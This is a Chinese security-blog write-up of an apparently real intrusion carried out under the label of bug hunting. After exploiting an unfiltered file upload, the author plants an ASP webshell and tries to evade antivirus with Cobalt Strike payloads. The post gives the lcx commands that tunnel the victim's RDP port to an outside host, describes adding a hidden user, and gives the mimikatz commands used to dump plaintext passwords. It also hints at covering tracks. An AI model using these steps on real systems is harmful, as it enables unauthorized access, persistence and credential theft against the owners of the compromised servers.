高质量的安全文章,安全offer面试经验分享
尽在 # 掌控安全EDU #
作者:掌控安全-药酱
0x00 前言
这两天想着挖一挖SRC,然后翻了点站,发现了个文件上传
0x01 Getshell
尝试上传asp小马
哟!这运气,毫无过滤直接起飞~~~
拿着我的小蚁剑连上我的马儿
无狗狗拦截,舒服啦!看看权限
直接管理员权限,连提权都不用了,看下IP开3389吧
是内网,3389倒是开了,现在要么就转发端口,要么就上CS/MSF 来操作,我还是上CS吧
0x02 瞎β操作之上马
掏出我的cs生成个马,执行试一下先
马执行了怎么没反弹呢?难道有杀软??
也没看到有杀软啊(这里的nc lcx ew 都是我之前上传的) 只能免杀一下再上
这里我用AVIATOR来免杀
看看360和火绒的效果
效果不错奥,接着干就完事了
WTF????
怎么还是不行???
算了,还是换条路吧,lcx转发出来吧
0x03 端口转发
随便找个目录上传lcx
lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389
这里的意思是把本机的3389转发到公网的4444端口
我这边没win的外网服务器(主要是穷)
我就用NATAPP来转发吧
然后下载客户端本地运行NATAPP
这里的tcp://xxxx.com:1565 是给的域名ping一下转换端口,后面的1565是随机给的端口
等等在lcx那里要改成这里的端口
这里本地监听
lcx.exe -listen 5656 5555
意思是监听本地5656端口然后转发给5555
ok监听成功,去连接本地的5555端口试一下
芜湖~ 起飞~
添加个隐藏用户吧
0x04 读取密码
既然都上来了那就读取一下管理员的密码吧 直接上mimikatz
privilege::debug
sekurlsa::logonpasswords
mimikatz! 永远滴神 成功读取明文密码,后面就不继续了。
该删的要删了
0x05 总结
这次完全就是运气好,先是上传没有限制,也没有防护软件。
后面虽然上马出了问题,但是还是转发了出来,之后上服务器发现了瑞星,但是lcx和mimikatz都没杀,很奇怪。
然后发现了是虚拟机,就不接着操作了,再会!
回顾往期内容
代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!
扫码白嫖视频+工具+进群+靶场等资料
扫码白嫖!
还有免费的配套靶场、交流群哦!
本文始发于微信公众号(掌控安全EDU):实战纪实|运气爆棚直接获得服务器权限
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论